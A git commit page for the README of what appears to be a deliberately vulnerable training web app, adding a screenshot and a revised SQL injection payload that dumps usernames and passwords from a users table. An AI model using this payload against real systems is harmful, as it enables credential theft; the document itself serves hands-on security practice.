sqlinjection print added
This commit is contained in:
parent
1209507c81
commit
accbd82724
2 changed files with 3 additions and 1 deletions
|
|
@ -36,7 +36,9 @@ To login you can use the following credentials:
|
||||||
## Hack and have fun !
|
## Hack and have fun !
|
||||||
|
|
||||||
If you are playing it in low dificulty, just to have a taste of how exploit a flaw in this app, go to ```SQL Injection``` in the left menu.
|
If you are playing it in low dificulty, just to have a taste of how exploit a flaw in this app, go to ```SQL Injection``` in the left menu.
|
||||||
In the id field, add this query ```%' and 1=0 union select null, concat(first_name,'|',last_name,'|',user,'|',password) from users #```
|
In the id field, add this query:
|
||||||
|
|
||||||
|
%' and 1=0 union select null, concat(user,':',password) from users #
|
||||||
|
|
||||||

|

|
||||||
|
|
||||||
|
|
|
||||||
BIN
sqli.png
Normal file
BIN
sqli.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 231 KiB |
Loading…
Add table
Reference in a new issue